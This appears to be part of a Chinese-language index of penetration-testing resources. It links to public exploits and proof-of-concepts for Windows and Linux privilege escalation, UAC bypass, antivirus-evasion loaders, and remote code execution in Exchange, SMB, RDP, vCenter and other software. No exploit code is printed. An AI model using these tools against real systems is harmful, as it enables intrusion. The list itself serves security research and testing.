- [CVE-2023-28771-PoC: Zyxel firewalls 命令注入漏洞](https://github.com/BenHays142/CVE-2023-28771-PoC)
- [CVE-2023-25690-POC: Apache HTTP Server 请求走私漏洞](https://github.com/dhmosfunk/CVE-2023-25690-POC)
- [realor-sql-Injection-exp: 瑞友天翼应用虚拟化-远程代码执行/sql注入](https://github.com/hkxueqi/realor-sql-Injection-exp)
- [Apache-Solr-8.3.1-RCE: Apache Solr 8.3.1 admin panel RCE (Windows)](https://github.com/scrt/Apache-Solr-8.3.1-RCE)
- [CVE-2023-27997-check: Fortinet FortiOS SSL-VPN 远程代码执行漏洞](https://github.com/BishopFox/CVE-2023-27997-check)
- [CVE-2023-20178: Cisco AnyConnect Secure Mobility Client for Windows 系统权限提升漏洞](https://github.com/Wh04m1001/CVE-2023-20178)
- [CVE-2023-34960: Chamilon命令执行](https://github.com/Aituglo/CVE-2023-34960)
- [CVE-2023-23333:Contec SolarView Compact命令执行](https://github.com/Mr-xn/CVE-2023-23333)
## <span id="head5"> 提权辅助相关</span>
- [windows-kernel-exploits Windows平台提权漏洞集合](https://github.com/SecWiki/windows-kernel-exploits)
- [windows 溢出提权小记](https://klionsec.github.io/2017/04/22/win-0day-privilege/)/[本地保存了一份+Linux&Windows提取脑图](./tools/Local%20Privilege%20Escalation.md)
- [Windows常见持久控制脑图](./tools/Windows常见持久控制.png)
- [CVE-2019-0803 Win32k漏洞提权工具](./CVE-2019-0803)
- [脏牛Linux提权漏洞](https://github.com/Brucetg/DirtyCow-EXP)-[reverse_dirty-更改的脏牛提权代码,可以往任意文件写入任意内容](https://github.com/Rvn0xsy/reverse_dirty)|[linux_dirty:更改后的脏牛提权代码,可以往任意文件写入任意内容,去除交互过程](https://github.com/Rvn0xsy/linux_dirty)|[dirtycow-mem:脏牛利用C源码](https://github.com/sqlnetcat/dirtycow-mem)-[文章](https://mp.weixin.qq.com/s/xUhr6D9mGnrE_cJw1kmyFA)-[备份](https://archive.ph/wip/NCL3w)-[备份1](https://web.archive.org/web/20220918065539/https://mp.weixin.qq.com/s/xUhr6D9mGnrE_cJw1kmyFA)
- [远控免杀从入门到实践之白名单(113个)](https://github.com/TideSec/BypassAntiVirus)|[远控免杀从入门到实践之白名单(113个)总结篇.pdf](./books/远控免杀从入门到实践之白名单(113个)总结篇.pdf)
- [Linux提权-CVE-2019-13272 A linux kernel Local Root Privilege Escalation vulnerability with PTRACE_TRACEME](https://github.com/jiayy/android_vuln_poc-exp/tree/master/EXP-CVE-2019-13272-aarch64)
- [Linux权限提升辅助一键检测工具](https://github.com/mzet-/linux-exploit-suggester)
- [将powershell脚本直接注入到进程中执行来绕过对powershell.exe的限制](https://github.com/EmpireProject/PSInject)
- [CVE-2020-2696 – Local privilege escalation via CDE dtsession](https://github.com/0xdea/exploits/blob/master/solaris/raptor_dtsession_ipa.c)
- [CVE-2020-0683-利用Windows MSI “Installer service”提权](https://github.com/padovah4ck/CVE-2020-0683/)
- [Linux sudo提权辅助工具—查找sudo权限配置漏洞](https://github.com/TH3xACE/SUDO_KILLER)
- [Windows提权-CVE-2020-0668:Windows Service Tracing本地提权漏洞](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668)
- [Linux提取-Linux kernel XFRM UAF poc (3.x - 5.x kernels)2020年1月前没打补丁可测试](https://github.com/duasynt/xfrm_poc)
- [linux-kernel-exploits Linux平台提权漏洞集合](https://github.com/SecWiki/linux-kernel-exploits)
- [Linux提权辅助检测Perl脚本](https://github.com/jondonas/linux-exploit-suggester-2)|[Linux提权辅助检测bash脚本](https://github.com/mzet-/linux-exploit-suggester)|[Unix-PrivEsc:本地 Unix 系统提权集合](https://github.com/FuzzySecurity/Unix-PrivEsc)
- [CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost](https://github.com/danigargu/CVE-2020-0796)|[【Windows提取】Windows SMBv3 LPE exploit 已编译版.exe](https://github.com/f1tz/CVE-2020-0796-LPE-EXP)|[SMBGhost_RCE_PoC-远程代码执行EXP](https://github.com/chompie1337/SMBGhost_RCE_PoC)|[Windows_SMBv3_RCE_CVE-2020-0796漏洞复现](./books/Windows_SMBv3_RCE_CVE-2020-0796漏洞复现.pdf)|[CVE-2020-0796](https://github.com/ran-sama/CVE-2020-0796)
- [getAV---windows杀软进程对比工具单文件版](./tools/getAV/)
- [【Windows提权工具】Windows 7 to Windows 10 / Server 2019](https://github.com/CCob/SweetPotato)|[搭配Cobalt Strike的修改版可上线system权限的session](https://github.com/lengjibo/RedTeamTools/tree/master/windows/SweetPotato)|[RoguePotato:又一个 Windows 提权工具](https://github.com/antonioCoco/RoguePotato)
- [【Windows提权工具】SweetPotato修改版,用于webshell下执行命令](https://github.com/uknowsec/SweetPotato)|[本地编译好的版本](./tools/SweetPotato.zip)|[点击下载或右键另存为](https://raw.githubusercontent.com/Mr-xn/Penetration_Testing_POC/master/tools/SweetPotato.zip)|[SweetPotato_webshell下执行命令版.pdf](./books/SweetPotato_webshell下执行命令版.pdf)|[JuicyPotato修改版-可用于webshell](https://github.com/uknowsec/JuicyPotato)|[JuicyPotatoNG:另一个 juicypotato](https://github.com/antonioCoco/JuicyPotatoNG)|[DCOMPotato: Some Service DCOM Object and SeImpersonatePrivilege abuse.](https://github.com/zcgonvh/DCOMPotato)|[GodPotato: 适用于Windows 2012 - Windows 2022的土豆提权工具](https://github.com/BeichenDream/GodPotato)
- [【bypass UAC】Windows 8.1 and 10 UAC bypass abusing WinSxS in "dccw.exe"](https://github.com/L3cr0f/DccwBypassUAC/)
- [【Windows提权】CVE-2018-8120 Exploit for Win2003 Win2008 WinXP Win7](https://github.com/alpha1ab/CVE-2018-8120)
- [【Windows提权 Windows 10&Server 2019】PrintSpoofer-Abusing Impersonation Privileges on Windows 10 and Server 2019](https://github.com/itm4n/PrintSpoofer)|[配合文章食用-pipePotato复现](./books/pipePotato复现.pdf)|[Windows 权限提升 BadPotato-已经在Windows 2012-2019 8-10 全补丁测试成功](https://github.com/BeichenDream/BadPotato)
- [【Windows提权】Windows 下的提权大合集](https://github.com/lyshark/Windows-exploits)
- [【Windows提权】-CVE-2020-1048 | PrintDemon本地提权漏洞-漏洞影响自1996年以来发布(Windows NT 4)的所有Windows版本](https://github.com/ionescu007/PrintDemon)
- [【Windows bypass UAC】UACME-一种集成了60多种Bypass UAC的方法](https://github.com/hfiref0x/UACME)
- [CVE-2020–1088: Windows wersvc.dll 任意文件删除本地提权漏洞分析](https://medium.com/csis-techblog/cve-2020-1088-yet-another-arbitrary-delete-eop-a00b97d8c3e2)
- [【Windows提权】CVE-2019-0863-Windows中错误报告机制导致的提权-EXP](https://github.com/sailay1996/WerTrigger)
- [【Windows提权】CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP)
- [【Windows提权】CVE-2020-0787-EXP-ALL-WINDOWS-VERSION-适用于Windows所有版本的提权EXP](https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION)|[CVE-2020-0787:提权带回显](https://github.com/yanghaoi/CVE-2020-0787)|[CVE-2020-0787_CNA:适用于Cobalt Strike的CVE-2020-0787提权文件](https://github.com/yanghaoi/CobaltStrike_CNA/tree/main/ReflectiveDllSource/CVE-2020-0787_CNA)
- [【Windows提权】CVE-2020-1054-Win32k提权漏洞Poc](https://github.com/0xeb-bp/cve-2020-1054)|[CVE-2020-1054-POC](https://github.com/Iamgublin/CVE-2020-1054)
- [【Linux提权】对Linux提权的简单总结](./books/对Linux提权的简单总结.pdf)
- [【Windows提权】wesng-Windows提权辅助脚本](https://github.com/bitsadmin/wesng)|[Windows-Exploit-Suggester:又一个 Windows 提权辅助Python脚本](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
- [【Windows提权】dazzleUP是一款用来帮助渗透测试人员进行权限提升的工具,可以在window系统中查找脆弱面进行攻击。工具包括两部分检查内容,exploit检查和错误配置检查。](https://github.com/hlldz/dazzleUP)
- [【Windows提权】KernelHub-近二十年Windows权限提升集合](https://github.com/Ascotbe/KernelHub)
- [【Windows提权】Priv2Admin-Windows提权工具](https://github.com/gtworek/Priv2Admin)
- [【windows提权】利用有漏洞的技嘉驱动程序来加载恶意的驱动程序提升权限或干掉驱动级保护的杀软](https://github.com/alxbrn/gdrv-loader)|[备份地址](https://github.com/Mr-xn/gdrv-loader)
- [【windows提权】byeintegrity-uac:通过劫持位于本机映像缓存中的DLL绕过UAC](https://github.com/AzAgarampur/byeintegrity-uac)
- [【Windows 提权】InstallerFileTakeOver:Windows Installer 本地提权漏洞PoC](https://github.com/klinix5/InstallerFileTakeOver)
- [【Linux 提权】CVE-2021-4034:Linux Polkit 权限提升漏洞(pkexec)](https://github.com/berdav/CVE-2021-4034)|[PwnKit:cve-2021-4034,可获得交互式shell或者执行单个命令](https://github.com/ly4k/PwnKit)|[cve-2021-4034:单命令执行版本](https://github.com/wudicainiao/cve-2021-4034)|[CVE-2021-4034-NoGCC:CVE-2021-4034简单优化,以应对没有安装gcc和make的目标环境](https://github.com/EstamelGG/CVE-2021-4034-NoGCC)
- [【Windows 提权】CVE-2022-21882:win32k LPE bypass CVE-2021-1732](https://github.com/KaLendsi/CVE-2022-21882)|[又一个CVE-2022-21882提权工具](https://github.com/L4ys/CVE-2022-21882)
- [【Windows 提权】CVE-2022-21999:Windows 打印机提权漏洞(此漏洞是去年打印机提权漏洞Printnightmare的续集)](https://github.com/ly4k/SpoolFool)
- [【Windows 提权】CVE-2022-29072:7-Zip帮助页面命令注入漏洞](https://github.com/kagancapar/CVE-2022-29072)
- [PEASS-ng:提权检测工具,支持 Windows 和 Linux](https://github.com/carlospolop/PEASS-ng)
- [【Linux提权】LinEnum:Linux 提权检查脚本](https://github.com/rebootuser/LinEnum)
- [【Windows 提权】sam-the-admin:CVE-2021-42278 and CVE-2021-42287域内提权](https://github.com/WazeHell/sam-the-admin)
- [【Windows 提权】KrbRelayUp:域内提权](https://github.com/Dec0ne/KrbRelayUp)
- [【Windows 提权】Auto-Elevate:通过bypass UAC 和令牌模拟提权到 system权限](https://github.com/FULLSHADE/Auto-Elevate)
- [【Linux 提权】CVE-2021-4204:Linux Kernel eBPF Local Privilege Escalation](https://github.com/tr3ee/CVE-2021-4204)
- [【Linux 提权】CVE-2022-23222:Linux Kernel eBPF Local Privilege Escalation](https://github.com/tr3ee/CVE-2022-23222)
- [【Windows 提权】PrivExchange:通过滥用Exchange将您的权限交换为域管理权限](https://github.com/dirkjanm/PrivExchange)
- [【Windows 提权】PetitPotam:替代PrintBug用于本地提权的新方式,主要利用MS-EFSR协议中的接口函数](https://github.com/crisprss/PetitPotam)
- [【Windows 提权】DiagTrackEoP:绕过服务账户限制滥用DiagTrack服务与SeImpersonate权限进行权限提升](https://github.com/Wh04m1001/DiagTrackEoP)
- [【Windows 提权】WinPwnage:UAC bypass, Elevate, Persistence methods](https://github.com/rootm0s/WinPwnage)
- [【Windows 提权】CVE-2022-31262:GOG Galaxy LPE Exploit](https://github.com/secure-77/CVE-2022-31262)
- [【Linux】CVE-2021-4034:pkexec 本地提权漏洞](https://github.com/arthepsy/CVE-2021-4034)|[又一个cve-2021-4034](https://github.com/Silencecyber/cve-2021-4034)
- [【Linux 提权】CVE-2021-4154:Linux Kernel 资源管理错误漏洞](https://github.com/Markakd/CVE-2021-4154)
- [【Linux 提权】CVE-2022-34918:netfilter nf_tables 本地提权](https://github.com/veritas501/CVE-2022-34918)
- [【Linux 提权】CVE-2022-1972-infoleak-PoC:Linux-netfilter-越界写入漏洞](https://github.com/randorisec/CVE-2022-1972-infoleak-PoC)
- [【Linux 提权】CVE-2022-32250-exploit](https://github.com/theori-io/CVE-2022-32250-exploit)
- [Elevator:UAC Bypass by abusing RPC and debug objects.](https://github.com/Kudaes/Elevator)
- [【Linux 提权】CVE-2022-2639-PipeVersion](https://github.com/avboy1337/CVE-2022-2639-PipeVersion)
- [【Linux 提权】CVE-2022-2588](https://github.com/Markakd/CVE-2022-2588)
- [【Windows 提权】PetitPotato:通过PetitPotam进行本地提权](https://github.com/wh0Nsq/PetitPotato)
- [LocalPotato:一个使用新potato技术来进行windows本地提权](https://github.com/decoder-it/LocalPotato)
- [EfsPotato:Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)](https://github.com/zcgonvh/EfsPotato)
- [【Linux 提权】CVE-2023-32233: Linux Kernel 权限提升漏洞](https://github.com/Liuk3r/CVE-2023-32233)
- [【Linux 提权】CVE-2023-0386: Linux OverlayFS权限提升漏洞](https://github.com/veritas501/CVE-2023-0386)
- [【Linux提权】CVE-2023-2008: Linux Kernel 权限提升漏洞](https://github.com/bluefrostsecurity/CVE-2023-2008)
- [【win提权】CVE-2023-21752: Windows 备份服务特权提升漏洞](https://github.com/Wh04m1001/CVE-2023-21752)
- [【win提权】CVE-2023-29343: Windows 特权提升漏洞的 SysInternals Sysmon](https://github.com/Wh04m1001/CVE-2023-29343)
- [【Linux提权】CVE2023-1829: Linux Kernel 权限提升漏洞](https://github.com/lanleft/CVE2023-1829)
## <span id="head6"> PC</span>
- [ 微软RDP远程代码执行漏洞(CVE-2019-0708)](./BlueKeep)-[CVE-2019-0708-EXP-Windows-CVE-2019-0708-EXP-Windows版单文件exe版,运行后直接在当前控制台反弹System权限Shell](https://github.com/cbwang505/CVE-2019-0708-EXP-Windows)
- [CVE-2019-0708-python版](./BlueKeep/bluekeep-CVE-2019-0708-python)
- [MS17-010-微软永恒之蓝漏洞](https://github.com/Mr-xn/MS17-010)
- [macOS-Kernel-Exploit](./macOS-Kernel-Exploit)
- [CVE-2019-1388 UAC提权 (nt authority\system)](https://github.com/jas502n/CVE-2019-1388)
- [CVE-2019-1405和CVE-2019-1322:通过组合漏洞进行权限提升 Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation](https://github.com/apt69/COMahawk)
- [CVE-2019-11708](https://github.com/0vercl0k/CVE-2019-11708)
- [Telegram(macOS v4.9.155353) 代码执行漏洞](https://github.com/Metnew/telegram-links-nsworkspace-open)
- [Remote Desktop Gateway RCE bugs CVE-2020-0609 & CVE-2020-0610](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/)
- [Microsoft SharePoint - Deserialization Remote Code Execution](https://github.com/Voulnet/desharialize/blob/master/desharialize.py)
- [CVE-2020-0728-Windows Modules Installer Service 信息泄露漏洞](https://github.com/irsl/CVE-2020-0728/)
- [CVE-2020-0618: 微软 SQL Server Reporting Services远程代码执行(RCE)漏洞](https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/)|[GitHub验证POC(其实前文的分析文章也有)](https://github.com/euphrat1ca/CVE-2020-0618)
- [CVE-2020-0767Microsoft ChakraCore脚本引擎【Edge浏览器中的一个开源的ChakraJavaScript脚本引擎的核心部分】安全漏洞](https://github.com/phoenhex/files/blob/master/pocs/cve-2020-0767.js)
- [CVE-2020-0688:微软EXCHANGE服务的远程代码执行漏洞](https://github.com/random-robbie/cve-2020-0688)|[CVE-2020-0688_EXP---另一个漏洞检测利用脚本](https://github.com/Yt1g3r/CVE-2020-0688_EXP)|[又一个cve-2020-0688利用脚本](https://github.com/Ridter/cve-2020-0688)|[Exploit and detect tools for CVE-2020-0688](https://github.com/zcgonvh/CVE-2020-0688)
- [CVE-2020-0674: Internet Explorer远程代码执行漏洞检测](https://github.com/binaryfigments/CVE-2020-0674)
- [CVE-2020-8794: OpenSMTPD 远程命令执行漏洞](./CVE-2020-8794-OpenSMTPD%20远程命令执行漏洞.md)
- [Linux平台-CVE-2020-8597: PPPD 远程代码执行漏洞](https://github.com/marcinguy/CVE-2020-8597)
- [Windows-CVE-2020-0796:疑似微软SMBv3协议“蠕虫级”漏洞](https://cert.360.cn/warning/detail?id=04f6a686db24fcfa478498f55f3b79ef)|[相关讨论](https://linustechtips.com/main/topic/1163724-smbv3-remote-code-execution-cve-2020-0796/)|[CVE-2020–0796检测与修复](CVE-2020-0796检测与修复.md)|[又一个CVE-2020-0796的检测工具-可导致目标系统崩溃重启](https://github.com/eerykitty/CVE-2020-0796-PoC)
- [WinRAR 代码执行漏洞 (CVE-2018-20250)-POC](https://github.com/Ridter/acefile)|[相关文章](https://research.checkpoint.com/2019/extracting-code-execution-from-winrar/)|[全网筛查 WinRAR 代码执行漏洞 (CVE-2018-20250)](https://xlab.tencent.com/cn/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/)
- [windows10相关漏洞EXP&POC](https://github.com/nu11secur1ty/Windows10Exploits)
- [shiro rce 反序列 命令执行 一键工具](https://github.com/wyzxxz/shiro_rce)
- [CVE-2019-1458-Win32k中的特权提升漏洞【shell可用-Windows提取】](https://github.com/unamer/CVE-2019-1458)
- [CVE-2019-1253-Windows权限提升漏洞-AppXSvc任意文件安全描述符覆盖EoP的另一种poc](https://github.com/sgabe/CVE-2019-1253)|[CVE-2019-1253](https://github.com/padovah4ck/CVE-2019-1253)
- [BypassAV【免杀】Cobalt Strike插件,用于快速生成免杀的可执行文件](https://github.com/hack2fun/BypassAV)
- [CS-Loader-cobalt strike免杀生成](https://github.com/Gality369/CS-Loader)
- [CVE-2020-0674:Internet Explorer UAF 漏洞exp【在64位的win7测试了IE 8, 9, 10, and 11】](https://github.com/maxpl0it/CVE-2020-0674-Exploit)
- [SMBGhost_AutomateExploitation-SMBGhost (CVE-2020-0796) Automate Exploitation and Detection](https://github.com/Barriuso/SMBGhost_AutomateExploitation)
- [MS Windows OLE 远程代码执行漏洞(CVE-2020-1281)](https://github.com/guhe120/Windows-EoP/tree/master/CVE-2020-1281)
- [CVE-2020-1350-Windows的DNS服务器RCE检测的powershell脚本](https://github.com/T13nn3s/CVE-2020-1350)|[CVE-2020-1350-DoS](https://github.com/maxpl0it/CVE-2020-1350-DoS)
- [CVE-2020-1362-Microsoft Windows WalletService权限提升漏洞](https://github.com/Q4n/CVE-2020-1362)
- [CVE-2020-10713-GRUB2 本地代码执行漏洞](https://github.com/eclypsium/BootHole)
- [CVE-2020-1313-Microsoft Windows Update Orchestrator Service权限提升漏洞,可用于Windows提权操作,支持新版的Windows server 2004](https://github.com/irsl/CVE-2020-1313)
- [CVE-2020-1337-exploit-Windows 7/8/10上Print Spooler组件漏洞修复后的绕过](https://github.com/math1as/CVE-2020-1337-exploit/)|[cve-2020-1337-poc](https://github.com/sailay1996/cve-2020-1337-poc)
- [CVE-2020-1472: NetLogon特权提升漏洞(接管域控制器)](https://github.com/VoidSec/CVE-2020-1472)|[CVE-2020-1472 .NET版本的,可以编译成独立EXE文件,可以尝试webshell执行](https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon/SharpZeroLogon)|[同类型脚本](https://github.com/SecuraBV/CVE-2020-1472)|[同类型脚本二](https://github.com/dirkjanm/CVE-2020-1472)|[同类型脚本三](https://github.com/risksense/zerologon)|[同类型脚本4](https://github.com/bb00/zer0dump)
- [awesome-browser-exploit-浏览器漏洞集合](https://github.com/Escapingbug/awesome-browser-exploit)
- [【Linux提权】CVE-2021-3156-SUDO缓冲区溢出漏洞](https://github.com/blasty/CVE-2021-3156)
- [CVE-2021-21972-任意文件上传](https://github.com/NS-Sp4ce/CVE-2021-21972)|[CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC)|[CVE-2021-21972](https://github.com/yaunsky/CVE-2021-21972)
- [CVE-2021-26855-ssrf通过golang实现,可读取邮件标题,id,FQND以及下载邮件功能](https://github.com/Mr-xn/CVE-2021-26855)|[针对CVE-2021-26855进行利用下载邮件的python脚本](https://github.com/Mr-xn/CVE-2021-26855-d)|[exchange-ssrf-rce-利用SSRF直接获取命令执行权限](https://github.com/jeningogo/exchange-ssrf-rce)
[exprolog-ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)](https://github.com/herwonowr/exprolog)
- [CVE-2021-21978- VMware View Planner Harness 4.X 未授权任意文件上传至RCE](https://github.com/GreyOrder/CVE-2021-21978)
- [VMware vCenter Server RCE_SSRF[CVE-2021-21972_3]](./books/VMware%20vCenter%20Server%20RCE_SSRF%5BCVE-2021-21972_3%5D.pdf)-[原文地址](https://mp.weixin.qq.com/s/NoqpuklgwNOalJgAuFnlcA)
- [CVE-2021-1732 Windows 本地权限提升漏洞](https://github.com/jessica0f0116/cve_2021_1732)
- [CVE-2021-31166:HTTP协议栈远程代码执行漏洞](https://github.com/0vercl0k/CVE-2021-31166)
- [Windows本地提权漏洞:CVE-2021-1732-Exploit](https://github.com/KaLendsi/CVE-2021-1732-Exploit)
- [【Linux提权】CVE-2021-3560 Local PrivEsc Exploit](https://github.com/swapravo/polkadots)|[CVE-2021-3560-Authentication-Agent](https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent)
- [【windows提权】CVE-2021-1675 Windows Print Spooler远程代码执行漏洞](./CVE-2021-1675.md)
- [【Linux提权】CVE-2021-22555: Linux Netfilter本地权限提升漏洞](./CVE-2021-22555.md)
- [【Linux提权】CVE-2021-33909:Linux kernel 本地提权漏洞](https://github.com/Liang2580/CVE-2021-33909)
- [【windows提权】CVE-2021-36934:Windows 特权提升漏洞](./books/CVE-2021-36934:Windows提权漏洞.pdf)|[CVE-2021-36934 POC](https://github.com/cube0x0/CVE-2021-36934)
- [【Linux提权】CVE-2021-3490:Linux kernel 缓冲区错误漏洞](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490)
- [【Linux 提权】CVE-2022-2602: Linux io_uring子系统UAF漏洞漏洞利用POC,可用于本地提权](https://github.com/LukeGix/CVE-2022-2602)
- [CVE-2021-34473:Microsoft Exchange Server Remote Code Execution](https://github.com/phamphuqui1998/CVE-2021-34473)|[proxyshell-auto:自动化的ProxyShell漏洞利用](https://github.com/Udyz/proxyshell-auto)
- [【Linux 提权】CVE-2021-33909:Linux kernel 本地提权漏洞](https://github.com/ChrisTheCoolHut/CVE-2021-33909)
- [CVE-2021-40444:Windows MSHTML 0day漏洞](https://github.com/lockedbyte/CVE-2021-40444)
- [PrintNightmare:CVE-2021-1675 / CVE-2021-34527 exploit](https://github.com/outflanknl/PrintNightmare)|[CVE-2021-1675的 PowerShell 版本](https://github.com/calebstewart/CVE-2021-1675)|[CVE-2021-1675:Impacket实现的py 脚本](https://github.com/cube0x0/CVE-2021-1675)
- [CVE-2021-40444:MSHTML代码执行漏洞 RCE](https://github.com/lockedbyte/CVE-2021-40444)
- [CVE-2021-37980:Google Chrome 沙箱漏洞 POC](https://github.com/ZeusBox/CVE-2021-37980)
- [【Windows 提权】CVE-2021-40449 EXP about windows 10 14393 LPE](https://github.com/KaLendsi/CVE-2021-40449-Exploit)|[CallbackHell:CVE-2021-40449 Win32k提权漏洞](https://github.com/ly4k/CallbackHell)
- [CVE-2021-22005:VMware vCenter Server任意文件上传漏洞](https://github.com/r0ckysec/CVE-2021-22005)|[又一个 cve-2021-22005利用工具(仅支持 Linux 版本的vCenter)](https://github.com/shmilylty/cve-2021-22005-exp)
- [CVE-2021-40539:ManageEngine ADManager Plus 未授权访问RCE](https://github.com/synacktiv/CVE-2021-40539)
- [CVE-2021-42321:微软Exchange Server远程代码执行漏洞(需要省份验证)](https://github.com/DarkSprings/CVE-2021-42321)
- [VMware_vCenter:VMware vCenter版本小于7.0.2.00100的未授权任意文件读取+SSRF+XSS](https://github.com/l0ggg/VMware_vCenter)
- [noPac:CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter(Microsoft Windows Active Directory 权限许可和访问控制问题漏洞)](https://github.com/cube0x0/noPac)|[Python 版本noPac](https://github.com/Ridter/noPac)|[NoPacScan:又一个 Python 的CVE-2021-42287/CVE-2021-42278扫描工具](https://github.com/knightswd/NoPacScan)|[CVE-2022-21907:DOS 攻击脚本](https://github.com/polakow/CVE-2022-21907)|[Pachine:CVE-2021-42278的Python 版本实现](https://github.com/ly4k/Pachine)
- [CVE-2022-21907](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907)|[CVE-2022-21907:Windows HTTP协议栈远程代码执行漏洞(有待验证)](https://github.com/antx-code/CVE-2022-21907)|[PowerShell 版本CVE-2022-21907:Windows HTTP协议栈远程代码执行漏洞检查工具](https://github.com/mauricelambert/CVE-2022-21907)
- [sunlogin_rce:向日葵 RCE](https://github.com/Mr-xn/sunlogin_rce)|[Sunlogin_RCE-GUI:向日葵漏洞图形化利用工具](https://github.com/savior-only/Sunlogin_RCE-GUI-)|[sunlogin_exp_for_tututu:基于 nmap的向日葵RCE 扫描工具](https://github.com/SkyBlueEternal/sunlogin_exp_for_tututu)
- [CVE-2022-0847:Linux Dirty Pipe 内核提权漏洞](https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit)|[CVE-2022-0847](https://github.com/bbaranoff/CVE-2022-0847)|[又一个CVE-2022-0847利用](https://github.com/EagleTube/CVE-2022-0847)
- [CVE-2022-0543:Redis Lua沙盒绕过命令执行](https://github.com/vulhub/vulhub/tree/master/redis/CVE-2022-0543)|[REDIS-CVE-2022-0543:golang 写的利用工具](https://github.com/Newbee740/REDIS-CVE-2022-0543)
- [CVE-2022-24122的验证型 payload](https://github.com/meowmeowxw/CVE-2022-24122)
- [CVE-2022-25636:Linux kernel越界写入漏洞](https://github.com/Bonfee/CVE-2022-25636)
- [CVE-2022-0778:openssh DOS 漏洞](https://github.com/drago-96/CVE-2022-0778)
- [CVE-2019-13272:Linux 4.10 < 5.1.17 PTRACE_TRACEME local root](https://github.com/jas502n/CVE-2019-13272)
- [CVE-2021-3493:Ubuntu OverlayFS Local Privesc](https://github.com/briskets/CVE-2021-3493)
- [CVE-2022-0995:Linux 内核watch_queue内存损坏导致代码执行](https://github.com/Bonfee/CVE-2022-0995)
- [CVE-2022-27666:Linux local privilege escalation](https://github.com/plummm/CVE-2022-27666)
- [CVE-2022-22639:MAC 权限提升漏洞](https://github.com/jhftss/CVE-2022-22639)
- [CVE-2022-1015:Linux 权限提升漏洞](https://github.com/pqlx/CVE-2022-1015)
- [CVE-2022-25372:Local Privilege Escalation In Pritunl VPN Client](https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2022-25372)
- [CVE-2022-22972:VMware 身份验证绕过漏洞](https://github.com/horizon3ai/CVE-2022-22972)
- [cve-2022-26809:RPC 高危漏洞](https://github.com/corelight/cve-2022-26809)|[PoC-CVE-2022-26809](https://github.com/s1ckb017/PoC-CVE-2022-26809)|[相关分析文章](https://paper.seebug.org/1906/)
- [CVE-2022-30190:Microsoft Office Word Rce ](https://github.com/bytecaps/CVE-2022-30190)|[CVE-2022-30190](https://github.com/JMousqueton/PoC-CVE-2022-30190)|[follina.py:CVE-2022-30190 检测工具](https://github.com/chvancooten/follina.py)|[CVE-2022-30190:又一个](https://github.com/onecloudemoji/CVE-2022-30190)|[CVE-2022-30190-follina-Office-MSDT-Fixed:可以自定义word模板](https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed)|[CVE-2022-30190---Follina---Poc-Exploit](https://github.com/WesyHub/CVE-2022-30190---Follina---Poc-Exploit)
- [【Windows 提权】CVE-2021-31956-EXP:Windows 内核堆栈溢出漏洞利用工具](https://github.com/aazhuliang/CVE-2021-31956-EXP)
- [【Linux 提权】vault_range_poc:CVE-2021-26708 四字节写特殊竞争UAF转化为内核任意读写漏洞](https://github.com/hardenedvault/vault_range_poc)
- [【Windows 提权】CVE-2021-21551:Dell BIOS驱动权限提升漏洞](https://github.com/waldo-irc/CVE-2021-21551)|[CVE-2021-21551 cobaltstrike BOF 版的利用工具](https://github.com/tijme/kernel-mii)
- [Chrome-Android-and-Windows-0day-RCE-SBX:chrome 的 Windows 和 Android 版本RCE+SBX(沙箱逃逸)漏洞](https://github.com/emredavut/Chrome-Android-and-Windows-0day-RCE-SBX)
- [CoreTrustDemo:macOS 12.3.1 上 CVE-2022-26766 的概念验证](https://github.com/zhuowei/CoreTrustDemo)
- [CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera:chrome 内核系列浏览器泄露环境变量漏洞](https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera)
- [unrar-cve-2022-30333-poc:unRAR 6.11之前版本存在目录穿越漏洞](https://github.com/rbowes-r7/unrar-cve-2022-30333-poc)|[cve-2022-30333 另一个 POC](https://github.com/TheL1ghtVn/CVE-2022-30333-PoC)
- [CVE-2022-21894:Windows Secure Boot 绕过漏洞](https://github.com/Wack0/CVE-2022-21894)
- [CVE-2022-29968:Linux内核版本号码低于或等于5.17.5 kiocb fs/io_uring.c io_rw_init_file初始化漏洞](https://github.com/jprx/CVE-2022-29968)
- [CVE-2022-36946:Linux kernel 5.18.14及以前版本存在造成拒绝服务(panic)漏洞](https://github.com/Pwnzer0tt1/CVE-2022-36946)
- [CVE-2022-28281:Firefox 越界写入漏洞](https://github.com/0vercl0k/CVE-2022-28281)
- [CVE-2022-34718:TCP/IP RCE POC](https://github.com/numencyber/VulnerabilityPoC/blob/main/CVE-2022-34718/poc.cpp)|[分析](https://medium.com/@numencyberlabs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf)
- [ProxyNotShell-PoC:PoC for CVE-2022-41040 and CVE-2022-41082 Microsoft Exchange Server RCE](https://github.com/testanull/ProxyNotShell-PoC)
- [CVE-2022-28672: Foxit PDF Reader Remote Code Execution Exploit](https://github.com/hacksysteam/CVE-2022-28672)
- [CVE-2022-44666:Windows 联系人远程代码执行漏洞](https://github.com/j00sean/CVE-2022-44666)
